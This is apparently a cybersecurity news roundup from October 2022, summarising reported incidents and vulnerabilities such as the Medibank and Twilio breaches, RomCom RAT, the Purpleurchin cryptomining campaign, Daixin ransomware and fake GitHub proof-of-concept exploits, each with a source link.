Medibank now says hackers accessed all its customers’ personal data

Customers of Australian insurance firm Medibank have had their personal information compromised in an attack by hackers. The attack also saw a large amount of health claims data accessed in the ransomware operation. An internal investigation into the attack has shown that the threat actors had far greater access to customer data than initially thought.

The following data was confirmed to be accessed:

• All ahm customers’ personal data and significant amounts of health claims data.
• All international student customers’ personal data and significant amounts of health claims data.
• All Medibank customers’ personal data and significant amounts of health claims data.

While data access and data exfiltration are separate things, the threat actors managed to remove some of the accessed data, so customers should assume that all of this data was stolen.

Just last week, Medibank assured its 2.8 million customers that there was no evidence of any customer data having been accessed. However, a few days after playing down the impact of the incident, the ransomware gang made contact to extort the company, providing a sample of 100 stolen files out of an alleged 200GB of data stolen during the attack.

Based on this development, Medibank uprgraded its response and support to customers by providing the following:

• Financial support for customers who are in a uniquely vulnerable position as a result of this crime.
• Free identity monitoring services for customers who have had their primary ID compromised
• Reimbursement of fees for re-issue of identity documents that have been fully compromised in this crime.
• Specialist identity protection advice and resources from IDCARE.
• Medibank’s mental health and wellbeing support line.
  
  
  

Source – https://www.bleepingcomputer.com/news/security/medibank-now-says-hackers-accessed-all-its-customers-personal-data/

Unknown Actors are Deploying RomCom RAT to Target Ukrainian Military

A new spear-phishing campaign, utilising a remote access trojan called RomCom RAT has been observed targeting Ukrainian military institutions earlier this month. This signifies a shift in direction for the threat actors targets as they had been previously attributed to spoofing legitimate apps like Advanced IP Scanner and pdfFiller to drop backdoors on compromised systems.

While previous iterations of the campaign involved the use of trojanized Advanced IP Scanner, the unidentified adversarial collective has since switched to pdfFiller as of October 20, indicating an active attempt on part of the adversary to refine tactics and thwart detection. These lookalike websites host a rogue installer package that results in the deployment of the RomCom RAT, which is capable of harvesting information and capturing screenshots, all of which is exported to a remote server.

The attacker’s latest method used on the military in Ukraine employs a phishing email with an embedded link as an initial infection vector, leading to a fake website dropping the next stage downloader. This downloader, signed using a valid digital certificate from “Blythe Consulting sp. z o.o.” for an extra layer of evasion, is then used to extract and run the RomCom RAT malware. BlackBerry said the same signer is used by the legitimate version of pdfFiller.

Besides the Ukrainian military, other targets of the campaign include IT companies, food brokers, and food manufacturing entities in the U.S., Brazil, and the Philippines. It also highlights between cybercrime-motivated threat actors and targeted attack threat actors with both now using similar tools.

Source – https://thehackernews.com/2022/10/romcom-hackers-circulating-malicious.html

Hackers Actively Exploiting Cisco AnyConnect and GIGABYTE Drivers Vulnerabilities

Cisco has warned of active exploitation attempts targeting a pair of two-year-old security flaws in the Cisco AnyConnect Secure Mobility Client for Windows. Tracked as CVE-2020-3153 (CVSS score: 6.5) and CVE-2020-3433 (CVSS score: 7.8), the vulnerabilities could enable local authenticated attackers to perform DLL hijacking and copy arbitrary files to system directories with elevated privileges. While CVE-2020-3153 was addressed by Cisco in February 2020, a fix for CVE-2020-3433 was shipped in August 2020.

The alert comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) moved to add the two flaws to its Known Exploited Vulnerabilities (KEV) catalog, alongside four bugs in GIGABYTE drivers, citing evidence of active abuse in the wild. The vulnerabilities — assigned the identifiers CVE-2018-19320, CVE-2018-19321, CVE-2018-19322, and CVE-2018-19323, and patched in May 2020 — could permit an attacker to escalate privileges and run malicious code to take complete control of an affected system.

The development also follows a full report released last week by Singapore-based Group-IB detailing the tactics employed by a Russian-speaking ransomware group called OldGremlin in its attacks on entities operating in the country. One of the primary methods of gaining first access is by exploiting the aforementioned Cisco AnyConnect errors, taking advantage of the weaknesses of the GIGABYTE drivers to disable security software, the latter also used by the BlackByte ransomware group.

Source – https://thehackernews.com/2022/10/hackers-actively-exploiting-cisco.html

Massive cryptomining campaign abuses free-tier cloud dev resources

GitHub, Heroku, and Buddy services have been targeted to mine cryptocurrency at the provider’s expense. The automated and large-scale ‘freejacking’ operation relies on abusing the limited resources offered to free-tier cloud accounts to generate a tiny profit from each free account, which, when combined, becomes something more significant.

The threat actor behind the campaign, called ‘Purpleurchin,’ was observed performing over a million function calls daily, using CI/CD service providers such as GitHub (300 accounts), Heroku (2,000 accounts), and Buddy.works (900 accounts). The use of those accounts is rotated and channeled through 130 Docker Hub images with mining containers, while obfuscation on all operational levels has kept Purpleurchin undetected until now.

Operation details

The core of the operation is a linuxapp container (‘linuxapp84744474447444744474’) that acts as the command and control server (C2) and Stratum server, coordinating all active mining agents and directing them to the threat actor’s mining pool. A shell script (‘userlinux8888′) is used to automate the creation of GitHub accounts, create a repository, and replicate the workflow using GitHub actions. All GitHub actions are obfuscated using random strings for the names. Purpleurchin uses OpenVPN and Namecheap VPN to register each account with a different IP address to evade GitHub’s bot activity detection. The GitHub actions launch over 30 instances of Docker images on each run, using pre-set arguments for the script to be executed, proxy IP and port to connect to, Stratum ID name, and max memory and CPU amounts to use. Eventually, another script (“linuxwebapp88”) will validate the configuration on the Stratum server, receive the Docker command contained in the GitHub repository, and start the miner container. The miner uses a tiny part of the server’s CPU power to stealthily mine a range of crypto coins such as Tidecoin, Onyx, Surgarchain, Sprint, Yenten, Arionum, MintMe, and Bitweb. The mining process employs a custom Stratum mining protocol relay that hampers network scanners’ ability to discover the outbound connections to mining pools.

The cryptocurrency chosen by the mining threat actors is marginally profitable, so it can be assumed that the operation is in an early experimental stage or is trying to take control of blockchains by creating a 51% network controlling majority.

Source – https://www.bleepingcomputer.com/news/security/massive-cryptomining-campaign-abuses-free-tier-cloud-dev-resources/

CISA Warns of Daixin Team Hackers Targeting Health Organizations With Ransomware

US cyber security and intelligence agencies have issued a joint warning against attacks perpetrated by a gang of cybercriminals known as the Daixin Team, which primarily targets the country’s health system. The Daixin Team is a ransomware and data extortion group that has targeted the HPH Sector with ransomware and data extortion operations since at least June 2022. The alert was published Friday by the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS).

Over the past few months, the group has been linked to numerous ransomware incidents in the Healthcare and Public Health (HPH) industry, involving the encryption of servers related to electronic health records, diagnostics, imaging, and intranet services. They are also said to have exfiltrated personally identifiable information (PII) and patient health information (PHI) as part of a double extortion program to obtain ransom from victims. Once successful, the ransomware moves laterally by making use of remote desktop protocol (RDP) and secure shell (SSH), followed by gaining elevated privileges using techniques like credential dumping.

One such attack targeted OakBend Medical Center on September 1, 2022, with the group claiming to have harvested approximately 3.5 GB of data, including more than one million patient and staff information records.A sample of 2,000 medical records was also posted on the data leak website, which included names, genders, dates of birth, social security numbers, addresses and more.

The Daixin Team’s ransomware is based on another strain called Babuk that was leaked in September 2021, and has been used as a foundation for a number of file-encrypting malware families such as Rook, Night Sky, Pandora, and Cheerscrypt. As mitigations, it’s recommended that organizations apply the latest software updates, enforce multi-factor authentication, implement network segmentation, and maintain periodic offline backups.

Source – https://thehackernews.com/2022/10/cisa-warns-of-daixin-team-hackers.html

Apple fixes new zero-day used in attacks against iPhones, iPads

Responding to reports saying a security flaw may have been actively exploited Apple has fixed the ninth zero-day vulnerability used in attacks against iPhones since the start of the year. The bug (CVE-2022-42827) is an out-of-bounds write issue reported to Apple by an anonymous researcher and caused by software writing data outside the boundaries of the current memory buffer.

This can lead to data corruption, program crashes, or memory corruption. If used in an attack, a potential attacker could use this zero-day vulnerability to execute arbitrary code with kernel privileges. The complete list of impacted devices includes iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later.

Apple addressed the zero-day vulnerability in iOS 16.1 and iPadOS 16 with improved bounds checking. While Apple has disclosed that it knows of active exploitation reports of this vulnerability in the wild, it has yet to release any information regarding these attacks.

Source – https://www.bleepingcomputer.com/news/apple/apple-fixes-new-zero-day-used-in-attacks-against-iphones-ipads/

Cyberattack Causes Disruptions at Wholesale Giant Metro

International wholesale chain Metro has confirmed service disruptions following a cyber-attack. With headquarters in Düsseldorf, Germany, the company operates more than 680 Metro and Makro stores in 24 countries and employs more than 95,000 people worldwide.

Metro said it has determined that the outage was caused by a cyber-attack but did not provide specifics on the matter. Infrastructure disruptions suggest ransomware may be involved. Although Metro stores are operating, and services are regularly available disruptions and delays may occur. Offline systems to process payments have been set up and online orders through the web app and online store are being processed but delays should be expected as well.

The company has not provided details on how many of its stores might have been impacted by the incident, but reports suggest that multiple stores in Austria, France, and Germany have been suffering disruptions.

Source – https://www.securityweek.com/cyberattack-causes-disruptions-wholesale-giant-metro

Thousands of GitHub repositories deliver fake PoC exploits with malware

Thousands of repositories on GitHub have been found to offer fake proof-of-concept (PoC) exploits for various vulnerabilities, some of them including malware. GitHub is one of the largest code hosting platforms, and researchers use it to publish PoC exploits to help the security community verify fixes for vulnerabilities or determine the impact and scope of a flaw.

Researchers at Leiden Institute of Advanced Computer Science analysed over 47,300 repositories advertising an exploit for a vulnerability between 2017 and 2021 using the following three mechanisms:

• IP address analysis: comparing the PoC’s publisher IP to public blocklists and VT and AbuseIPDB.
• Binary analysis: run VirusTotal checks on the provided executables and their hashes.
• Hexadecimal and Base64 analysis: decode obfuscated files before performing binary and IP checks.

Of the 150,734 unique IPs extracted, 2,864 matched blocklist entries, 1,522 were detected as malicious in antivirus scans on Virus Total, and 1,069 of them were present in the AbuseIPDB database. The binary analysis examined a set of 6,160 executables and revealed a total of 2,164 malicious samples hosted in 1,398 repositories. In total, 4,893 repositories out of the 47,313 tested were deemed malicious, with most of them concerning vulnerabilities from 2020.

A plethora of different malware and harmful scripts were found, ranging from remote access trojans to Cobalt Strike. One interesting case is that of a PoC for CVE-2019-0708, commonly known as “BlueKeep”, which contains a base64-obfuscated Python script that fetches a VBScript from Pastebin. The script is the Houdini RAT, an old JavaScript-based trojan that supports remote command execution via the Windows CMD.

Software testers are advised to carefully scrutinize the PoCs they download and run as many checks as possible before executing them and testers should follow these three steps:

• Read carefully the code you are about to run on your or your customer’s network.
• If the code is too obfuscated and needs too much time to analyze manually, sandbox it in an environment (ex: an isolated Virtual Machine) and check your network for any suspicious traffic.
• Use open-source intelligence tools like VirusTotal to analyze binaries.
  
  

Source – https://www.bleepingcomputer.com/news/security/thousands-of-github-repositories-deliver-fake-poc-exploits-with-malware/

Notorious ‘BestBuy’ hacker arraigned for running dark web market

The US Dept of Justice have arraigned a notorious British hacker for allegedly running the now defunct ‘The Real Deal” dark web marketplace. The 34-year-old defendant Daniel Kaye (aka Bestbuy, Spdrman, Popopret, UserL0ser) allegedly ran the illicit services market between early 2015 and November 2016 when The Real Deal shut down. Threat actors had used the platform to sell everything from stolen US government system credentials and hacking tools to drugs, weapons and government data.

Among the login credentials put up for sale on the dark web market, court documents mention credentials for computers belonging to NASA, the U.S. Navy and the U.S. Postal Service (USPS). Kaye also allegedly trafficked Twitter and Linked accounts and conspired with a threat actor known as TheDarkOverlord to sell stolen Social Security numbers. He laundered the cryptocurrency obtained while operating The Real Deal using the Bitmixer.io Bitcoin mixer service to hide the illicit gains from law enforcement’s blockchain tracing analysis efforts.

Kaye infamously hijacked and accidentally took down over 900,000 routers on Deutsche Telekom’s network in late November 2016 using a buggy Mirai botnet malware. He also advertised DDoS-for-hire renting services backed by a massive botnet of over 400,000 Mirai-infected IoT devices. According to DOJ’s press release, Kaye was overseas when the indictment was filed, and he consented in September 2022 to his extradition from Cyprus to the U.S.

Source – https://www.bleepingcomputer.com/news/security/notorious-bestbuy-hacker-arraigned-for-running-dark-web-market/

Twilio discloses another hack from June, blames voice phishing

Twilio have disclosed a new data breach stemming from a June 2022 security incident. The cloud communications company stated that this breach of customer information is from the same threat actors who attacked in August. The attacker used social engineering to trick an employee into handing over their credentials in a voice phishing attack.

The hackers behind the August breach had accessed the data of 209 customers and 93 Authy end users after breaching some internal non-production systems using employee credentials stolen in an SMS phishing attack. Twilio did find that there was no evidence of any of its customers’ console account credentials, API keys, or authentication tokens had been accessed. While the company disclosed the incident on August 7, it now revealed the attackers maintained access to this environment for two more days.

Once inside Twilio’s systems, the hackers accessed customer data using administrative portals, accessed Authy 2FA accounts and codes, and registered their own devices to obtain temporary tokens. The Twilio data breach is part of a more extensive campaign from a threat actor tracked as Scatter Swine or 0ktapus that targeted at least 130 organizations, including MailChimp, Klaviyo, and Cloudflare. As a result of the June and August breaches, Twilio says it reset the credentials of the compromised employee user accounts and is distributing FIDO2 tokens to all employees.

Source – https://www.bleepingcomputer.com/news/security/twilio-discloses-another-hack-from-june-blames-voice-phishing/